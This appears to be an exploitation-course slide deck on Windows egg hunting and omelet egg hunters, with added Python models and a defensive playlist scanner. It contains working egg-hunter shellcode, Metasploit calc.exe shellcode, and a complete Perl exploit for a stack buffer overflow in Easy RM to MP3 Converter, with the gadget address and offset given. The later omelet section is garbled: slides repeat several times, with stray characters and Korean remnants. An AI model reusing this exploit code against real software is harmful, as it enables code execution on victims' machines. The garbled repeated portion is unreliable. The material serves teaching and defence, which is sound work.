System Hacking & Reverse Engineering
documented by h2spice [email protected]
[ Buffer Overflow - Egg Hunting ]
Who am I
Sanghwan Ahn (h2spice)
Works for LINE Corp.
Carrying out vulnerability research (exploitation, hunting, analysis)
Curriculum overview
System hacking / reversing
  Vulnerability fundamentals: Buffer Overflow, Format String Bug, Stack Overflow, Heap Overflow, Use After Free
  Exploitation (Win32 / *NIX / ARM): Overwriting RET, Egg Hunting, Overwriting SEH, RTL, ROP, Heap Spraying, Overwriting .dtors, Overwriting GOT
  Vulnerability / malware analysis
    Malware analysis
    Bug hunting (x86, ARM)
    Vulnerability analysis (software on x86, mobile)
    Source code analysis
    Fuzzing
    CVE-XXXX-XXXX, Exploit-DB, Inj3ct0r - 1337day
  Reverse engineering (iOS, Android)
Contents
Track3 - Exploitation
  Introduction
  Track3-1 Win32: Overwrite RET, Overwrite SEH, Egg-Hunting, ROP (Return Oriented Programming), Heap Spray
  Track3-2 *NIX: Overwrite RET, RTL (Ret-to-LibC), Overwrite .dtors, Overwrite GOT
  Track3-3 ARM: Overwrite RET, RTL (Ret-to-LibC), ROP (Return Oriented Programming)
What is Egg-Hunting?
- A technique that searches the process's VAS (Virtual Address Space)
- Useful when the attack vector only offers a very small buffer (on the assumption that the attacker can already control the program's flow)
- Egg hunting basically consists of three pieces of code:
  Egg hunter code
  Marker or tag
  Arbitrary shellcode
How does the Egg-Hunter code work?

Egg-Hunter code:
\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8
\x77\x30\x30\x74   (marker/tag: w00t)
\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7

Marker / Tag + Shell code (calc):
\x77\x30\x30\x74\x77\x30\x30\x74   (w00tw00t)
\x89\xe2\xda\xc1\xd9\x72\xf4\x58
\x50\x59\x49\x49\x49\x49\x43\x43
\x43\x43\x43\x43\x51\x5a\x56\x54
\x58\x33\x30\x56\x58\x34\x41\x50
\x30\x41\x33\x48\x48\x30\x41\x30
\x30\x41\x42\x41\x41\x42\x54\x41
\x41\x51\x32\x41\x42\x32\x42\x42
\x30\x42\x42\x58\x50\x38\x41\x43
\x4a\x4a\x49\x4b\x4c\x4a\x48\x50
\x44\x43\x30\x43\x30\x45\x50\x4c
\x4b\x47\x35\x47\x4c\x4c\x4b\x43
\x4c\x43\x35\x43\x48\x45\x51\x4a
\x4f\x4c\x4b\x50\x4f\x42\x38\x4c
\x4b\x51\x4f\x47\x50\x43\x31\x4a
\x4b\x51\x59\x4c\x4b\x46\x54\x4c
\x4b\x43\x31\x4a\x4e\x50\x31\x49
\x50\x4c\x59\x4e\x4c\x4c\x44\x49

1. Search memory and find the marker
2. Store the marker's address and jump there
3. Execute the shellcode
Important in order for Egg-Hunting to work
- You must be able to control the program's flow from user input: you must be able to jump to (jmp, call, push/ret) and execute some shellcode.
- The egg-hunter code must sit in a predictable memory location, so you can reliably jump to it and execute it.
- The marker/tag must be a unique identifier placed in front of the final shellcode: you must prepend the final shellcode with a unique string/marker/tag.
- You will have to test which memory-search technique (IsBadReadPtr, NtDisplayString, NtAccessCheckAndAuditAlarm) works on a particular system and for a particular exploit.
- The buffer only has to be big enough to hold the egg-hunter code: the amount of available buffer space can be relatively small, because it will only contain the so-called "egg-hunter".
- The final shellcode must be available somewhere in memory (stack/heap/etc.).
Egg-Hunter using SEH injection

my $egghunter =
  "\xeb\x21\x59\xb8" . "w00t" .
  "\x51\x6a\xff\x33\xdb\x64\x89\x23" .
  "\x6a\x02\x59\x8b\xfb\xf3\xaf\x75" .
  "\x07\xff\xe7\x66\x81\xcb\xff\x0f" .
  "\x43\xeb\xed\xe8\xda\xff\xff\xff" .
  "\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8" .
  "\x83\x04\x08\x06\x58\x83\xc4\x10" .
  "\x50\x33\xc0\xc3";

Egg-hunter code using SEH injection (disassembly):
EB21          jmp short 0x23
59            pop ecx
B890509050    mov eax,0x50905090     ; this is the Marker
51            push ecx
6AFF          push byte -0x1
33DB          xor ebx,ebx
648923        mov [fs:ebx],esp
6A02          push byte +0x2
59            pop ecx
8BFB          mov edi,ebx
F3AF          repe scasd
7507          jnz 0x20
FFE7          jmp edi
6681CBFF0F    or bx,0xfff
43            inc ebx
EBED          jmp short 0x10
E8DAFFFFFF    call 0x2
6A0C          push byte +0xc
59            pop ecx
8B040C        mov eax,[esp+ecx]
B1B8          mov cl,0xb8
83040806      add dword [eax+ecx],byte +0x6
58            pop eax
83C410        add esp,byte +0x10
50            push eax
33C0          xor eax,eax
C3            ret

Egg hunter size = 60 bytes, Egg size = 8 bytes
(1) Move the marker into EAX
(2) Repeat until the marker is found
Egg-Hunter using IsBadReadPtr

my $egghunter =
  "\x33\xdb\x66\x81" .
  "\xcb\xff\x0f\x43\x6a\x08\x53\xb8" .
  "\x0d\x5b\xe7\x77\xff\xd0\x85\xc0" .
  "\x75\xec\xb8" . "w00t" .
  "\x8b\xfb\xaf\x75\xe7\xaf\x75\xe4" .
  "\xff\xe7";

Egg-hunter code using IsBadReadPtr (disassembly):
33DB          xor ebx,ebx
6681CBFF0F    or bx,0xfff
43            inc ebx
6A08          push byte +0x8
53            push ebx
B80D5BE777    mov eax,0x77e75b0d
FFD0          call eax
85C0          test eax,eax
75EC          jnz 0x2
B890509050    mov eax,0x50905090     ; this is the Marker
8BFB          mov edi,ebx
AF            scasd
75E7          jnz 0x7
AF            scasd
75E4          jnz 0x7
FFE7          jmp edi

Egg hunter size = 37 bytes, Egg size = 8 bytes
(1) Move the marker into EAX
(2) Repeat until the marker is found
Egg-Hunter using NtDisplayString

my $egghunter =
  "\x66\x81\xCA\xFF\x0F\x42\x52\x6A" .
  "\x43\x58\xCD\x2E\x3C\x05\x5A\x74" .
  "\xEF\xB8" . "w00t" .
  "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7" .
  "\xFF\xE7";

Egg-hunter code using NtDisplayString (disassembly):
6681CAFF0F    or dx,0x0fff
42            inc edx
52            push edx
6A43          push byte +0x43
58            pop eax
CD2E          int 0x2e
3C05          cmp al,0x5
5A            pop edx
74EF          jz 0x0
B890509050    mov eax,0x50905090     ; this is the Marker
8BFA          mov edi,edx
AF            scasd
75EA          jnz 0x5
AF            scasd
75E7          jnz 0x5
FFE7          jmp edi

Egg hunter size = 32 bytes, Egg size = 8 bytes
(1) Move the marker into EAX
(2) Repeat until the marker is found
Egg-Hunter using NtAccessCheck(AndAuditAlarm)

my $egghunter =
  "\x66\x81\xCA\xFF\x0F\x42\x52\x6A" .
  "\x02\x58\xCD\x2E\x3C\x05\x5A\x74" .
  "\xEF\xB8" . "w00t" .
  "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7" .
  "\xFF\xE7";

Egg-hunter code using NtAccessCheckAndAuditAlarm (disassembly):
6681CAFF0F    or dx,0x0fff
42            inc edx
52            push edx
6A02          push byte +0x02
58            pop eax
CD2E          int 0x2e
3C05          cmp al,0x5
5A            pop edx
74EF          jz 0x0
B890509050    mov eax,0x50905090     ; this is the Marker
8BFA          mov edi,edx
AF            scasd
75EA          jnz 0x5
AF            scasd
75E7          jnz 0x5
FFE7          jmp edi

Egg hunter size = 32 bytes, Egg size = 8 bytes

This hunter has the same shape as the one using NtDisplayString, but it is a different kind of egg hunter. Instead of NtDisplayString it uses NtAccessCheckAndAuditAlarm (offset 0x02 in the KiServiceTable) to avoid the access violations that can occur when an invalid address is handed to the egg hunter.
For details on NtAccessCheck see the links below:
- http://undocumented.rawol.com/sbs-w2k-5-monitoring-native-api-calls.pdf
- http://xosmos.net/txt/nativapi.html
(1) Move the marker into EAX
(2) Repeat until the marker is found
Egg-Hunter using NtAccessCheck(AndAuditAlarm): step-by-step walk-through
1. Set the address at which the memory search starts
2. Increment the address for the next memory search
3. Save the address currently being examined on the stack
4. Put 0x2 into EAX (the syscall number for NtAccessCheckAndAuditAlarm) and invoke the syscall
5. Check whether an access violation (ACCESS_VIOLATION) occurred
6. Restore the EDX value
7. If an access violation occurred, jump back to the starting point (0x12cd6c)
8. Load the marker; store the address under examination (EDX) in EDI; compare the marker (EAX) with the memory at that address (EDI)
9. If the marker is not found, jump back to the starting point (0x12cd6c)
10. When the marker is found, jump to that location
Final shellcode
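The search loop from steps 1 to 10 (probe a page, skip it on an access violation, otherwise compare the tag twice and jump past it), modelled in Python as an added example for study. This is not code from the slides or any of the hunters shown on them. Assumed: memory is a dict of 4 KiB pages, a page missing from the dict stands in for the ACCESS_VIOLATION result of the NtAccessCheckAndAuditAlarm probe, and the sample address space, the tag position and the 0xCC placeholder bytes are constructed here.

```python
PAGE_SIZE = 0x1000
TAG = b"w00t"          # the 4-byte marker used on the slides
EGG = TAG * 2          # the hunter only stops on the tag repeated twice


def read_dword(space, addr):
    """Return the 4 bytes at addr, or None when any of them lies on an
    unmapped page. This stands in for the NtAccessCheckAndAuditAlarm probe:
    an ACCESS_VIOLATION result means "this page cannot be read, skip it"."""
    out = bytearray()
    for a in range(addr, addr + 4):
        page = space.get(a // PAGE_SIZE)
        if page is None:
            return None
        out.append(page[a % PAGE_SIZE])
    return bytes(out)


def egg_hunt(space, start=0, max_addr=0x7fff0000):
    """Model of the hunter's loop:
       - probe the current address; on an access violation move to the next
         page boundary (or dx,0xfff / inc edx) and probe again
       - otherwise compare the dword at EDI (= EDX) with the tag (scasd), then
         the following dword; a mismatch advances one byte (inc edx) and probes again
       - when both match, EDI points just past the egg: that is the jmp edi target
       Returns (address the hunter would jump to, number of probes), or
       (None, probes) when no egg exists below max_addr."""
    addr, probes = start, 0
    while addr < max_addr:
        probes += 1
        dword = read_dword(space, addr)
        if dword is None:
            addr = (addr | 0xfff) + 1          # skip to the next page
            continue
        if dword == TAG and read_dword(space, addr + 4) == TAG:
            return addr + 8, probes
        addr += 1
    return None, probes


def sample_space():
    """Constructed address space: page 0x10 is junk, page 0x11 is unmapped,
    page 0x12 holds a NOP sled, the egg and four 0xCC (int3) bytes that stand
    in for real shellcode."""
    junk = b"A" * PAGE_SIZE
    page = bytearray(junk)
    payload = b"\x90" * 16 + EGG + b"\xcc" * 4
    page[0x200:0x200 + len(payload)] = payload
    return {0x10: junk, 0x12: bytes(page)}


def demo():
    """Run the hunt over the sample space and return where it lands, how many
    probes it took, and the bytes it would start executing."""
    space = sample_space()
    target, probes = egg_hunt(space, start=0x10000)
    return target, probes, read_dword(space, target)


if __name__ == "__main__":
    target, probes, landed_on = demo()
    print(f"egg found, jmp edi -> {target:#x} after {probes} probes; bytes there: {landed_on.hex()}")
```

Two things the model makes visible: the unmapped page 0x11 costs a single probe because the hunter advances by a whole page on an access violation, whereas every readable byte costs one probe, which is why a hunter takes noticeably longer on a process with large readable regions; and the hunter searches for the tag twice in a row because its own code contains the tag once (the mov eax operand), so a single-tag search would find the hunter itself.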
Exercise Time :D / Target info
Win32: Easy RM to MP3 Converter v.2.7.3.700
Download link: http://outofcontrol.co.kr/vulnApp/EasyRM.zip
Vulnerability type: Buffer Overflow (stack based) when parsing a playlist
Exercise Time :D / Tip
- Generate a pattern with the mona plugin (!mona pattern_create 30000)
- NOP sled (0x90 * N)
- Shell code (windows/exec calc.exe):
  "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
  "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
  "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
  "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
  "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
  "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
  "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
  "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
  "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
  "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
  "\x7f\xe8\x7b\xca";
Exercise Time :D / Exploit info
- .m3u playlist file format
- Length of the junk data is 26039
- Gadget is 0x7608fcfe (jmp esp from MSRMCcodec02.dll)
Exercise Time :D / Exploit code (EggHuntingExploit.pl)

my $file = "EggHuntingExploit.m3u";
my $junk = "A" x 26039;
my $eip = pack('V', 0x7608fcfe);   # jmp esp from MSRMCcodec02.dll
my $padding = "\x90" x 25;
my $egghunter =
  "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" .
  "\x77\x30\x30\x74" .   # this is the marker/tag: w00t
  "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
my $shellcode = $padding .
  "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
  "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
  "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
  "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
  "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
  "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
  "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
  "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
  "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
  "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
  "\x7f\xe8\x7b\xca";

open($FILE, ">$file");
print $FILE $junk . $eip . $padding . $egghunter . "w00tw00t" . $shellcode;
close($FILE);
print "m3u File Created successfully\n";
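Seen from the defender's side, the playlist the script writes has several recognisable artefacts: one line far longer than any path or URL, a run of 0x90 bytes, the fixed byte prefix of one of the egg hunters listed on the earlier slides, and the doubled tag in front of the shellcode. The scanner below is an added Python example (not part of the slides or the exercise) that looks for exactly those. Assumed: a 1024-byte line-length threshold, 16 consecutive NOPs as the sled threshold, and two constructed sample playlists, the suspicious one using 0xCC bytes in place of any shellcode.

```python
# Byte prefixes of the hunters shown on the slides, up to and including the
# "mov eax," opcode (0xB8) that precedes the 4-byte tag.
HUNTER_PREFIXES = {
    "NtAccessCheckAndAuditAlarm": bytes.fromhex("6681caff0f42526a0258cd2e3c055a74efb8"),
    "NtDisplayString":            bytes.fromhex("6681caff0f42526a4358cd2e3c055a74efb8"),
    "IsBadReadPtr":               bytes.fromhex("33db6681cbff0f436a0853b8"),
}
# The SEH-injection hunter puts the tag right after "jmp short / pop ecx / mov eax,",
# so it is matched on the bytes that follow the tag instead.
SEH_HUNTER_TAIL = bytes.fromhex("516aff33db6489236a02598bfbf3af7507ffe7")
MAX_LINE = 1024          # assumed: a real playlist line (path or URL) is far shorter
NOP_SLED = b"\x90" * 16  # assumed threshold for calling a run of 0x90 a sled


def scan_playlist(data):
    """Return a list of (finding, details...) tuples; an empty list means
    nothing suspicious was seen."""
    findings = []
    for lineno, line in enumerate(data.split(b"\n"), 1):
        if len(line) > MAX_LINE:
            findings.append(("oversized_line", lineno, len(line)))
    if NOP_SLED in data:
        findings.append(("nop_sled", data.find(NOP_SLED)))
    tags = []
    for name, prefix in HUNTER_PREFIXES.items():
        pos = data.find(prefix)
        if pos != -1:
            tag = data[pos + len(prefix):pos + len(prefix) + 4]
            findings.append(("egg_hunter", name, tag))
            tags.append(tag)
    pos = data.find(SEH_HUNTER_TAIL)
    if pos >= 4:
        tag = data[pos - 4:pos]
        findings.append(("egg_hunter", "SEH", tag))
        tags.append(tag)
    # a hunter is only useful together with its egg: the tag doubled
    for tag in tags:
        egg_pos = data.find(tag * 2)
        if egg_pos != -1:
            findings.append(("egg", tag * 2, egg_pos))
    return findings


# Constructed samples: an ordinary playlist and one laid out like the exercise
# payload (junk, NOP sled, hunter, doubled tag), with 0xCC standing in for shellcode.
BENIGN_M3U = b"#EXTM3U\n#EXTINF:123,Sample Artist - Sample Title\nC:\\Music\\sample.mp3\n"
SUSPICIOUS_M3U = (
    b"A" * 3000 + b"\x90" * 25
    + HUNTER_PREFIXES["NtAccessCheckAndAuditAlarm"] + b"w00t"
    + bytes.fromhex("8bfaaf75eaaf75e7ffe7")        # remainder of that hunter
    + b"w00tw00t" + b"\xcc" * 32 + b"\n"
)


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_M3U), ("suspicious", SUSPICIOUS_M3U)):
        print(label, scan_playlist(sample))
```

The hunter prefixes are exact-match signatures and will miss a re-encoded hunter; the oversized-line and doubled-tag checks are the ones that survive such changes, since the layout (a huge line, then a tag repeated twice) is forced by the technique itself.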
What is the Omelet-Egg-Hunter?
- A shellcode fragmentation technique
- Introduced by Skylined (Berend-Jan Wever) (http://code.google.com/p/w32-seh-omelet-shellcode/)
- Useful when the attack vector only offers a very small buffer and the attacker controls nothing but several small, scattered pieces of memory
- The basic idea is the same as a normal egg hunter, with the following differences:
  The final shellcode is split into several pieces (several eggs)
  The final shellcode is reassembled before it runs (it is not executed as soon as it is found)
  It is larger than a normal egg hunter (about 90 bytes)
How does the Omelet-Egg-Hunter work?

Fragmentation layout of the original shellcode:
  Length of the egg
  Index number
  3-byte marker
  Fragmented shellcode (1/n, 2/n, 3/n ... n/n)
Omelet-Egg-Hunter code:
  Searches through memory
  Looks for all the eggs
  Assembles the fragmented shellcode into the final shellcode (reproduces the original shellcode at the bottom of the stack)
  Jumps to the reassembled shellcode and executes it
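The fragmentation and reassembly just described, as an added Python example; this is neither Skylined's omelet code nor code from the slides. It splits a buffer into eggs with the header order listed above (length, index, 3-byte marker, data), scatters them through a buffer out of order, finds them all and rebuilds the original in index order, refusing to rebuild when an egg is missing. The 3-byte marker b"w00", the 32-byte egg data size (matching Length(32) on the next slide) and the sample "shellcode" (just the bytes 1 to 80) are assumptions constructed for the demo.

```python
MARKER = b"w00"   # assumed 3-byte marker
EGG_DATA = 32     # data bytes per egg, matching Length(32) on the slides


def fragment(shellcode, egg_data=EGG_DATA, marker=MARKER):
    """Split shellcode into eggs laid out as [length][index][marker][data].
    Indexes start at 1; the last egg is padded with NOPs so every egg has
    the same size."""
    eggs = []
    for index, off in enumerate(range(0, len(shellcode), egg_data), 1):
        chunk = shellcode[off:off + egg_data].ljust(egg_data, b"\x90")
        eggs.append(bytes([egg_data, index]) + marker + chunk)
    return eggs


def find_eggs(memory, egg_data=EGG_DATA, marker=MARKER):
    """Scan memory for every egg: the marker preceded by the expected length
    byte and an index byte. Returns {index: data}; a duplicate index keeps
    the first copy seen."""
    found = {}
    pos = memory.find(marker)
    while pos != -1:
        if pos >= 2 and memory[pos - 2] == egg_data:
            index = memory[pos - 1]
            data = memory[pos + len(marker):pos + len(marker) + egg_data]
            if len(data) == egg_data and index not in found:
                found[index] = data
        pos = memory.find(marker, pos + 1)
    return found


def reassemble(memory, egg_count, egg_data=EGG_DATA, marker=MARKER):
    """Rebuild the original shellcode in index order. Returns None when any
    egg is missing: an omelet hunter must not hand control to a partial
    shellcode."""
    eggs = find_eggs(memory, egg_data, marker)
    if any(i not in eggs for i in range(1, egg_count + 1)):
        return None
    return b"".join(eggs[i] for i in range(1, egg_count + 1))


# Constructed demo: 80 bytes of stand-in "shellcode" (the bytes 1..80), cut
# into 3 eggs and scattered through a buffer in the wrong order.
SHELLCODE = bytes(range(1, 81))
EGGS = fragment(SHELLCODE)
MEMORY = (b"\x00" * 100 + EGGS[2] + b"Z" * 50 + EGGS[0]
          + b"\x00" * 77 + EGGS[1] + b"\x00" * 10)


if __name__ == "__main__":
    rebuilt = reassemble(MEMORY, len(EGGS))
    print("eggs:", sorted(find_eggs(MEMORY)))
    print("rebuilt == original:", rebuilt[:len(SHELLCODE)] == SHELLCODE)
```

The reassembled buffer is 96 bytes, not 80: the final egg's NOP padding comes along, which is harmless to execute but is why the hunter works from the egg count and size rather than from the original length.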
Example with three fragments (figure):

Fragmented shellcode 1/3: Length(32) Index(01) Marker
\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Fragmented shellcode 2/3: Length(32) Index(02) Marker
\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30
Fragmented shellcode 3/3: Length(32) Index(03) Marker
\x4a\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
Original shellcode (reassembled at the bottom of the stack)

Omelet-Egg-Hunter code:
  Search memory, find the marker
  Assemble the fragmented shellcode, then jump to the final shellcode and execute it
1. Search through memory
2. Find the marker
3. Check the length/index and reproduce that fragment of the original shellcode at the bottom of the stack (after fragment 1/3 the original-shellcode area holds \x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50)
4. Search through memory again
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
%
Find Marker
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
&
Check length/index
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
&
reproduces the original shellcode at the bottom of the stack
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
Search though memory
'
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
